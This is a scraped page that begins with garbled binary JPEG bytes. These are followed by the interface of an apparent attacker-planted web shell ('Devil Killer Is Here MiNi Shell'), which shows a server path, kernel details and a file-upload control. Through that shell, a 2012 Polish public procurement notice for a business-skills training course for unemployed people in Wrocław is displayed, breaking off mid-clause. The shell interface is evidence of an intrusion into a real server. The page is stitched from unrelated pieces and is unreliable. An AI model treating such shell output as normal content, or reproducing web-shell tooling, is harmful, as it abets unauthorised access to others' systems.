JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120417/120686-N-2012.html

<p class="kh_header"><b>Wrocław: Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                          i przeprowadzeniu szkolenia grupowego w zakresie: ABC działalności gospodarczej</b><br>
<b>Numer ogłoszenia: 120686 - 2012; data zamieszczenia: 17.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrocławiu , ul. Gliniana 20-22, 50-525 Wrocław, woj. dolnośląskie, tel. 71 7701 600, faks 71 7701 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pup.wroclaw.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                          i przeprowadzeniu szkolenia grupowego w zakresie: ABC działalności gospodarczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                          i przeprowadzeniu szkolenia grupowego w zakresie: ABC działalności gospodarczej.

2. Liczba uczestników szkolenia: maksymalnie 54 osoby, nie mniej niż 48 osób, w 3 grupach liczących po 16-18 osób w grupie.

3. Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy we Wrocławiu, posiadających umiejętność podstaw obsługi komputera, zamierzających rozpocząć własną działalność gospodarczą, które zostaną skierowane na kurs przez Zamawiającego po przeprowadzeniu  naboru.

4. Liczba godzin szkolenia: Szkolenie musi obejmować zajęcia teoretyczne, praktyczne,                   egzamin. Łącznie 160 godziny/grupa. Do czasu trwania szkolenia wlicza się czas przeznaczony na egzamin końcowy.

5. Źródło finansowania: Szkolenie będzie finansowane w całości ze środków publicznych (Fundusz Pracy).

6. Termin wykonania zamówienia: od dnia podpisania umowy do 30.04.2013r. 
Termin rozpoczęcia I grupy szkolenia: II kwartał 2012r.

7. Cel szkolenia:  Celem szkolenia jest przygotowanie teoretyczne i praktyczne uczestników szkolenia do zakładania własnego przedsiębiorstwa, w tym zdobywania środków na jego założenie oraz do prowadzenia własnej działalności gospodarczej.

8. Zakres szkolenia powinien obejmować co najmniej następujące zagadnienia:
- pomysł na własną firmę,
- regulacje prawne związane z prowadzeniem małego biznesu,
- krok po kroku - jak założyć własną firmę (w tym sklepu internetowego),
- elementy rachunkowości i księgowości dla małych firm (w tym rozliczenia podatkowe         i ubezpieczeniowe),
- podstawy marketingu i reklamy małej firmy,
- zatrudnianie pracowników w firmie,
- obsługa programu komputerowego niezbędnego do prowadzenia sklepu internetowego,
- opracowanie własnego biznes planu dla wybranej działalności z wykorzystaniem druku wniosku o przyznanie dofinansowania na rozpoczęcie działalności gospodarczej (druk obowiązujący  w PUP Wrocław)
- tworzenie elektronicznego wniosku o dotację ze środków unijnych.

9. Organizacja szkolenia:
9.1 Szkolenie należy zrealizować według planu nauczania obejmującego 40 godzin zegarowych w tygodniu. Jedną godzinę Zamawiający rozumie jako 60 minut (zajęcia edukacyjne liczące 45 minut oraz przerwa licząca 15 minut, przy czym długość przerw może być ustalona w sposób elastyczny);
9.2 Zajęcia muszą się odbywać w godz. między 08.00 - 18.00 od poniedziałku do piątku            (z wyłączeniem niedziel, świąt oraz dni ustawowo wolnych od pracy), w kolejno następujących po sobie dniach, liczba godzin dziennie nie może przekroczyć 8.                         W wyjątkowych sytuacjach dopuszczalne jest przeprowadzenie zajęć w soboty;
9.3 Miejsce wykonywania usługi szkoleniowej: Miasto Wrocław;
9.4 Wykonawca przygotuje program szkolenia. Egzamin końcowy musi być integralną częścią programu oraz wchodzić w skład ilości godzin przewidzianych programem. Egzamin końcowy musi być ujęty w Programie szkolenia w pozycji Plan nauczania z uwzględnieniem ilości godzin przewidzianych na ten egzamin oraz w harmonogramie szkolenia                             z uwzględnieniem daty tego egzaminu i ilości godzin przewidzianych na egzamin;
9.5 Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym;
9.6 Wszystkie zajęcia muszą być przeprowadzone z kadrą dydaktyczną wskazaną w ofercie. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej itp.;
9.7 Zajęcia muszą się odbywać w sali wykładowej przystosowanej do przeprowadzenia zajęć teoretycznych oraz w sali komputerowej do przeprowadzenia zajęć z wykorzystaniem komputera, wyposażonej w 18 komputerów. Sale szkoleniowe muszą być przestronne, jasno oświetlone, dostosowane do liczby uczestników szkolenia, spełniać warunki zgodne                      z przepisami dotyczącymi bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, zawierać osobne miejsca do siedzenia dla każdego uczestnika szkolenia umożliwiające swobodne sporządzanie notatek (stolik, ławka bądź krzesło z przystawką) oraz muszą być wyposażone w sprzęt techniczny niezbędny do sprawnego prowadzenia zajęć (tj. tablica, rzutnik, flipchart, itp.). Zajęcia z wykorzystaniem komputera muszą odbywać się                          w pracowni komputerowej, w której zapewniony jest swobodny dostęp uczestników do sprzętu	komputerowego (minimalna odległość między dwoma monitorami pracującymi obok siebie nie powinna być mniejsza niż 60 cm) wyposażonego w licencjonowane oprogramowanie niezbędne 	do prawidłowego przeprowadzenia szkolenia, tj. pakiet MS Office lub równoważny oraz program komputerowy do obsługi sklepu internetowego. Na jednego uczestnika szkolenia musi przypadać jedno stanowisko komputerowe posiadające napęd CD-RW i dostęp do Internetu. Zapewniony musi być również dostęp do pomieszczeń sanitarnych w budynku, w którym odbywają się zajęcia (w tym dostęp do WC zaopatrzonego w środki higieny) oraz do zaplecza socjalnego. W przypadku, gdy Wykonawca nie jest dysponentem potencjału technicznego musi załączyć dokument potwierdzający, że będzie dysponował lokalem lub sprzętem innego podmiotu na czas realizacji zamówienia;
9.8 Wykonawca ma obowiązek ubezpieczyć od następstw nieszczęśliwych wypadków, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, uczestników szkolenia wskazanych przez Zamawiającego;
9.9 Na pierwszych zajęciach Wykonawca przedstawi każdemu uczestnikowi szkolenia program szkolenia i harmonogram realizowanych zajęć;
9.10 Każdy uczestnik szkolenia otrzyma od Wykonawcy na własność minimum jeden podręcznik z zakresu obejmującego treści szkolenia (nie może być kserowany), inne materiały szkoleniowe i dydaktyczne, artykuły piśmiennicze w postaci zeszytu, długopisu, zakreślacza, czystej płyty CD-RW umożliwiającej wielokrotny zapis dokumentów stworzonych przez uczestników kursu. Dodatkowe materiały (np. skrypty, materiały ksero dotyczące przedmiotu zamówienia, które muszą być czytelne, estetycznie wykonane i dobrej jakości) mogą być przekazywane w trakcie zajęć, zgodnie z ich tematyką; 
9.11 Wykonawca zobowiązany jest do prowadzenia dokumentacji szkolenia obejmującej: dziennik zajęć edukacyjnych, indywidualne listy obecności uczestników szkolenia, protokoły  z egzaminów, karty ocen z okresowych sprawdzianów efektów kształcenia, rejestry wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia                 i uzyskanie kwalifikacji oraz do sprawowania nadzoru nad frekwencją uczestników szkolenia;
9.12 Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie systematycznej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób mających trudności w procesie nauczania;
9.13 W trakcie szkolenia (najpóźniej w połowie) oraz po jego zakończeniu Wykonawca przeprowadzi wśród wszystkich uczestników ocenę szkolenia za pomocą formularza anonimowej ankiety oceniającej dostarczonej przez Zamawiającego w dniu podpisania umowy;
9.14 Szkolenie powinno zakończyć się egzaminem a nabyte umiejętności powinny być potwierdzone zaświadczeniem o ukończeniu szkolenia lub innym dokumentem potwierdzającym ukończenie szkolenia i uzyskanie kwalifikacji zawierającym, o ile przepisy odrębne nie stanowią inaczej, zgodnie z wymaganiami określonymi w § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.): numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia,                            a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego  ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie. Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia Wykonawca dołącza do oferty;
9.15 Przedmiot zamówienia nie obejmuje świadczenia przez Wykonawcę usług cateringowych na rzecz uczestniczących w szkoleniu osób bezrobotnych skierowanych przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd	pracy właściwy dla siedziby instytucji szkoleniowej, zgodnie z ustawą z dnia 20 kwietnia 2004r.                 	o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69, poz. 415 z późn.	zm.) oraz rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r.                   	w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236, poz. 2365 z późn. zm.); warunek	ten zostanie spełniony, jeżeli instytucja szkoleniowa złoży wraz z ofertą stosowne oświadczenie 	o posiadaniu aktualnego na rok 2012 wpisu do Rejestru Instytucji Szkoleniowych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat	przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 	w tym 	okresie, przeprowadził z należytą starannością co najmniej 3 szkolenia grupowe	dla łącznie minimum 36 osób, o tematyce odpowiadającej przedmiotowi zamówienia                       	w wymiarze nie krótszym niż 80 godzin szkolenia, z podaniem ich wartości, przedmiotu, dat	wykonania i odbiorców. 
	Zamawiający przez grupę szkolenia rozumie minimum 12 osób szkolących się w tym samym	miejscu i w tym samym czasie tj. na tych samych zajęciach. Wykonawca musi	udokumentować, że wymieniona w wykazie zrealizowanych szkoleń, stanowiącym załącznik             	nr 4 do SIWZ usługa została należycie wykonana załączając dokumenty odbiorców wskazanych 	w w/w wykazie, potwierdzające, że każde ze zrealizowanych szkoleń zostało wykonane	należycie (np. referencje, podziękowania, pochwały itp.). Wykonawca jest zobowiązany	dołączyć do wykazu wykonanych usług - dokumenty lub informację - przedstawiające zakres	tematyczny zrealizowanych szkoleń, jeżeli nie wynika to z nazwy poszczególnego	szkolenia, wskazanego w wykazie lub z dołączonych dokumentów, potwierdzających należyte 	wykonanie usługi;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia	będzie dysponował salą wykładową przystosowaną do przeprowadzenia zajęć teoretycznych	oraz salą komputerową do przeprowadzenia zajęć z wykorzystaniem komputera, wyposażoną            	w 18 komputerów. Sale szkoleniowe muszą być przestronne, jasno oświetlone, dostosowane	do liczby uczestników szkolenia, spełniać warunki zgodne przepisami dotyczącymi	bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, zawierać osobne miejsca do	siedzenia dla każdego uczestnika szkolenia umożliwiające swobodne sporządzanie notatek	(stolik, ławka bądź krzesło z przystawką) oraz muszą być wyposażone w sprzęt	techniczny niezbędny do sprawnego prowadzenia zajęć (tj. tablica, rzutnik, flipchart, itp.).	Zajęcia z wykorzystaniem komputera muszą odbywać się w pracowni 	komputerowej, w której	zapewniony jest swobodny dostęp uczestników do sprzętu komputerowego (minimalna	odległość między dwoma monitorami pracującymi obok siebie nie powinna być mniejsza niż 60 	cm) wyposażonego w licencjonowane oprogramowanie niezbędne do prawidłowego	przeprowadzenia szkolenia, tj. pakiet MS Office lub równoważny oraz program komputerowy	do obsługi sklepu internetowego. Na jednego uczestnika szkolenia musi przypadać jedno	stanowisko komputerowe posiadające napęd CD-RW i dostęp do Internetu. Zapewniony musi	być również dostęp do pomieszczeń sanitarnych w budynku, w którym odbywają się zajęcia            	(w tym dostęp do WC zaopatrzonego w środki higieny) oraz do zaplecza socjalnego.                       	W przypadku, gdy Wykonawca nie jest dysponentem potencjału technicznego musi załączyć	dokument potwierdzający, że będzie dysponował lokalem lub sprzętem innego podmiotu	na czas realizacji zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia	będzie dysponował kadrą dydaktyczną składającą się z minimum trzech osób, z których każda	osoba musi posiadać wykształcenie wyższe związane z tematem prowadzonych zajęć,                           	i doświadczenie w realizacji co najmniej 3 szkoleń grupowych dla łącznie minimum 36 osób                    	w zakresie tematycznym odpowiadającym zakresem prowadzonych zajęć lub posiadać inne	wykształcenie wyższe nie związane z kierunkiem prowadzonych zajęć i doświadczenie                    	w realizacji co najmniej 4 szkoleń grupowych dla łącznie 48 osób w zakresie tematycznym	odpowiadającym zakresem prowadzonych zajęć. W przypadku	 nauczycieli za doświadczenie	uznaje się posiadanie rocznego stażu pracy dydaktycznej związanej z 	tematem prowadzonych	zajęć;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony Formularz oferty zgodnie z załącznikiem nr 2 do SIWZ.
2 Program szkolenia przygotowany przez Wykonawcę zgodnie z § 75 ust. 4 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.) zgodnie z załącznikiem nr 3 do SIWZ.
3 Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, zgodnie z wymaganiami określonymi w § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.). 
4 Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy Wykonawca składa ofertę przez ustanowionego pełnomocnika. Pełnomocnictwo musi zawierać wskazanie ustanowionego pełnomocnika oraz zakres jego umocowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartych w umowie w przypadkach:
1) zmiany terminu szkolenia w przypadku wystąpienia okoliczności niezależnych od Zamawiającego lub Wykonawcy,
2) zmiany osób prowadzących zajęcia na szkoleniu. Po uzyskaniu pisemnej zgody Zamawiającego,               w szczególnie uzasadnionych przypadkach (np. choroba, zgon, lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób wskazanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej porównywalnych kwalifikacjach i doświadczeniu. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia. Zamawiający może żądać od Wykonawcy zmiany osób przewidzianych do realizacji szkolenia, jeżeli uzna, że osoby te nienależycie wykonują swoje obowiązki. W takiej sytuacji Zamawiający pisemnie przedstawi powody, dla których żąda zmiany osób realizujących zamówienie i wskaże termin, w jakim Wykonawca zobowiązany będzie wskazać nowe osoby spełniające wymogi Zamawiającego. Kwalifikacje i doświadczenie nowych osób muszą być co najmniej równe jak u osób zastępowanych,
